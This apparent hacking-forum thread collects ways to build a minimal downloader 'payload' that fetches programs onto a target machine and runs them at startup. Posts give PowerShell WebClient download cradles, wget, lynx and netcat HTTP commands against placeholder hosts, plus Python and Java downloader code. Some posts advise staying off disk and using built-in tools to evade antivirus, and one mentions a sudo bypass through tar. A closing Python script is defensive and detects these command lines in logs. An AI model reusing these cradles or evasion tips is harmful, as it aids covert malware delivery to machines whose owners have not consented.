Posted

Looking for a minimal FTP or WGET type program that I can use as part of a payload.

Just has to be a really simple and very small program. No command line arguments or GUI needed, just code in the URL of the file you want to get.

Doesn't require outside libraries, i.e. curl, boost, .NET, so it is a standalone program that will run on most machines.

Just need to get a few files from the internet and save them to a specific location on the target machine.

Basically want to download the programs to the machine and run them on startup. Seems like all of the "simple" programs that will do this require a lib that is like 2400 additional files. I'm wondering if I can do this with maybe 1, 2 or 3 files?

If you want to post an example in another language that's cool. Doesn't have to be C. Just easily deployable.

Any thoughts? :ph34r:

Posted

Have you looked at TFTP [Wikipedia entry, RFC]? It's a lot simpler than other file transfer protocols (which will make it slower), but there are plenty of standalone clients about.

Posted

Netcat? Pretty much direct socket plug.

Posted

FTP servers require a login and password by default, so scripting will probably still be needed unless you pre-load all the info into a bundled executable.

What OS are you using as the target? Most machines have some form of built-in FTP client, but no FTP works without commands other than scripting it to do the login and downloads for you.

You might want to take advantage of things like PowerShell on a Windows OS since this will be installed by default on anything later than XP - https://www.google.com/#q=powershell+download+file and

For linux, almost all distros have FTP installed, but you can also use lynx if installed on Linux:

lynx -dump http://somesite.com/file.ext

If using Metasploit and looking for payloads though, just use meterpreter and send the files over using Metasploit itself. Mind you, you want things to stay off disk so they don't get scanned or caught by the target system, so not sure you would want to use tools known to be scanned for that could get you caught, and you can use the OS itself to just do it for you without setting off alarms. What you upload to the target is a whole other ball game and the programs you upload themselves need to pass AV and malware scans.

Posted

FTP servers require a login and password by default

The simple ones don't. Anonymous FTP used to be the most common form before all you eeeevil haxorz had your way with them.

Posted

The simple ones don't. Anonymous FTP used to be the most common form before all you eeeevil haxorz had your way with them.

Anonymous ftp still requires you to enter:

User: anonymous

Pass: anonymous@somesite.com (any email address basically)

Posted

I like the powershell idea. I think doing this on Windows is going to be pretty simple.

Maybe just write out an array of all of the possible networking tools and their possible install locations and loop through until it finds a networking tool that will do the job. I had a heck of a time trying to do this on Ubuntu because it wanted a sudoer password for each system call. The code executes but it needs user interaction. Debian is set up with the root user as default so you can run a bunch of system calls without any extra permissions.

I'm actually really surprised there isn't some kind of downloader payload already available.

This is the simplest example I could come up with thus far. Python.

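#!/usr/bin/env python3
# Download one file over HTTP and save it under the given local name.
# (urllib.urlretrieve is Python 2 only; Python 3 moved it to urllib.request.)
from urllib.request import urlretrieve

urlretrieve("http://hak5.org/wp-content/uploads/2012/08/hak5-50.png", filename="hak5-50.png")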

I suppose I can make that happen with py2exe, one of those Python compilers.

QB64 has some simple networking features but they currently only work on Windows. Not that that is a bad thing.

Also anybody know a scripted way to do this with metasploit? I'll probably come up with quite a few ways to do this by the time I'm finished.

Thanks everybody for ideas.

Posted

Jeez. I thought you wanted light weight. Python is a lot of things, but it installs at a few megs minimum.

On a Linux box, try curl or wget which are both downloading tools you can script up the wazoo, are effectively installed everywhere and won't require root access either.

Posted

+1 for sure. A call to wget might be the easiest way to handle this on a Linux box. PowerShell on Windows as someone had suggested. Maybe just system calls.

Coding. Thanks guys.

Posted

I don't have the link handy, but I saw something the other day that bypasses sudo systematically using tools that can execute code without need for root. Namely tar was one of them listed that allows you to start up other programs as root (if I read the article correctly) by piping it out in a bash script. Personally I'd prefer something encrypted such as scp or sftp, but to use built-in tools, ftp is built into most OS's, even if it sends everything you do in the clear, it works.

If you wanted a quick download, there are other ways of downloading in Windows with bat and VBS scripting, although PowerShell would be one way from the command line alone. If you don't specify the whole path in the output part (c:\file.txt) then it saves it to the default user's directory, i.e. c:\users\username\file.txt - PowerShell one-liner:

(new-object System.Net.WebClient).DownloadFile('http://www.somfile.com/file.txt','c:\file.txt')

Parentheses are required or it will error out. Could write a cmdlet.ps1 script as well but I'm not much of a PowerShell user. I googled for the above example to test myself, which worked, and that's how I found out Windows wants a full path for the output or it puts it in the home directory.

I used to have a VBS one for wscript that came in handy on some XP machines back in the day, but I'm sure you can google for help with those.

Posted

Gotta love one liners. :cool: These are all really good suggestions.

Posted (edited)

I know someone had already mentioned netcat but

$ echo -ne "GET /file.txt HTTP/1.1\r\nHost: www.somfile.com\r\n\r\n" | nc www.somfile.com 80 > ./file.txt

EDIT: this will also include the server header information, which will need to be removed. I just forgot about that.

Edited by fugu
Posted

Yeah, I was looking at ways of doing it with telnet logging the output, but as you mentioned, it put all the headers in the file, not to mention messes up the encoding and spacing. netcat adds the headers, but 1, not a native app of any OS, which helps with using built in tools for downloading, and 2, if using external tools, wget would probably be the easiest to use command line tool.

Posted

Well, since you're getting the payload to grab a file off of a server you control, you could modify the server to not include any headers for a specific request and just dump the binary into the socket. Might mess up proxy servers and such though, but if you're running an HTTPS server that problem will be circumvented as well.

Posted

Ok it was bugging me that I couldn't figure this out, but here is a jacked up way to do it:

$ echo -ne "GET /file.txt HTTP/1.1\r\nHost: www.somfile.com\r\n\r\n" | nc www.somfile.com 80 | sed ':a;N;$!ba;s/\r\n\r\n/\x00/' | sed ':a;N;$!ba;s/[^\x00]*\x00//' > ./file.txt

This "should" remove the headers, however as I've read, sed does not always allow the use of ; so on some systems this might not work.

Posted

Pipe it through this sed command

sed '1,/^\s*$/d'

HTTP gives you all the headers and such, then an empty line, then the actual contents. This sed statement will drop everything up until and including this empty line.

  • 4 weeks later...
Posted (edited)

I'm trying this Powershell thing on Windows 7.

Powershell (New-Object System.Net.WebClient).DownloadFile('Url', Path)

Sometimes I'm getting an error like:

The file name, directoryname, or volume label syntax is incorrect.

Or I get an overload error.

What am I doing wrong? I've never really used powershell.

Edited by vailixi
Posted
open cmd.exe > powershell (enter)
(new-object System.Net.WebClient).DownloadFile('http://www.ticktockcomputers.com/robots.txt','c:\file.txt')

Is path surrounded with single quotes? Not sure if that makes a difference, but I also assume you're being generic, and not using path but instead the full drive path needed. I just downloaded my site's robots.txt file, code exactly like pasted above.

Posted

Open wireshark, start capturing, and then try the command. Check wireshark when the error happens, but I'm guessing, it's an issue retrieving the file and you may learn more looking through the traffic to see what happens. To test this, try grabbing a different known file as well, see if it works. If it does it for all files, then maybe some settings in your system, or you need to elevate to admin(although I didn't have to on my system).

Posted

Verify the use of a slash in a path. Chances are you need double-slashes (because the slash might be the escape char for special characters) or alternatively prepend the path with an '@' to indicate there is nothing to escape in there and slashes are just that: slashes. It's something C# does so I wouldn't be surprised if it leaked into the PowerShell syntax.

Posted (edited)

I was having about zero success with powershell but I did find a nice java snippet that works. I need to include some error code so it doesn't crash if the server comes back 403 or something like that. But it does download and save the file. Not exactly a one liner though.

import java.io.BufferedInputStream;
import java.io.ByteArrayOutputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.net.URL;

public class DownloadFile {

  public static void main(String[] args) throws IOException {

    String fileName = "filename"; // The file that will be saved on your computer
    URL link = new URL("url");    // The file that you want to download

    // download
    InputStream in = new BufferedInputStream(link.openStream());
    ByteArrayOutputStream out = new ByteArrayOutputStream();
    byte[] buf = new byte[1024];
    int n = 0;
    while (-1 != (n = in.read(buf))) {
      out.write(buf, 0, n);
    }
    out.close();
    in.close();
    byte[] response = out.toByteArray();

    FileOutputStream fos = new FileOutputStream(fileName);
    fos.write(response);
    fos.close();
    // end of download
  }

}

Got it here: http://code.runnable.com/Uu83dm5vSScIAACw/download-a-file-from-the-web-for-java-files-and-save

Edited by vailixi
Posted (edited)

Well, we can reduce that quite a bit:

import java.io.FileOutputStream;
import java.io.InputStream;
import java.net.URL;

public class DownloadFile {
  // Usage: java DownloadFile <output-file> <url>
  public static void main(String[] args) throws Exception {
    FileOutputStream out = new FileOutputStream(args[0]);
    InputStream in = new URL(args[1]).openStream();
    byte[] buf = new byte[1024];
    int bytesRead; // declared outside the loop so the loop condition can see it
    // read() returns -1 at end of stream, so only write when data was read
    while ((bytesRead = in.read(buf)) >= 0) {
      out.write(buf, 0, bytesRead);
    }
    out.close();
    in.close();
  }
}
Edited by Cooper
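
Seen from the defender's side, each one-liner suggested in this thread leaves a recognisable command line in process-creation or shell logging. The following is an added example, not code from any poster in the thread: a small Python matcher for those command-line shapes. The rule names, the patterns and the sample lines (which use the placeholder host example.test) are assumptions constructed for illustration.

```python
import re

# Rules modelled on the one-liners quoted in this thread. Rule names are made up
# for this example; tune the patterns before running them over real logs.
RULES = {
    "powershell_webclient": re.compile(
        r"new-object\s+(system\.)?net\.webclient\)?\s*\.\s*download(file|string|data)"),
    "wget_curl_url": re.compile(r"(^|[\s/\\|;&])(wget|curl)(\.exe)?\s[^|;&]*https?://"),
    "lynx_dump": re.compile(r"(^|[\s/|;&])lynx\s[^|;&]*-dump\s[^|;&]*https?://"),
    "netcat_http": re.compile(
        r"get\s+\S+\s+http/1\.[01].*\|\s*(nc|ncat|netcat)\s+\S+\s+\d+"),
}

def normalise(cmdline):
    """Lower-case and collapse runs of whitespace so spacing and case do not matter."""
    return re.sub(r"\s+", " ", cmdline).strip().lower()

def classify(cmdline):
    """Return the sorted names of every rule that matches one command line."""
    text = normalise(cmdline)
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def scan(lines):
    """Return (line_number, rule_names) for each command line with at least one hit."""
    hits = []
    for number, line in enumerate(lines, start=1):
        names = classify(line)
        if names:
            hits.append((number, names))
    return hits

# Constructed sample input: command lines as a process-creation log might record them.
SAMPLE = [
    r"powershell (New-Object System.Net.WebClient).DownloadFile('http://example.test/a.txt','c:\a.txt')",
    r"PowerShell.exe (NEW-OBJECT   Net.WebClient).DownloadFile('http://example.test/a.txt','c:\a.txt')",
    "wget -q http://example.test/file.ext -O /tmp/file.ext",
    "curl --version",
    "lynx -dump http://example.test/file.ext",
    r'sh -c echo -ne "GET /file.txt HTTP/1.1\r\nHost: example.test\r\n\r\n" | nc example.test 80',
    "tar czf backup.tgz /home/user",
]

if __name__ == "__main__":
    for number, names in scan(SAMPLE):
        print(number, ", ".join(names))
```

Lines 4 and 7 of the sample are benign and produce no hit; a match on its own is a lead to triage, since administrators use the same tools legitimately.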
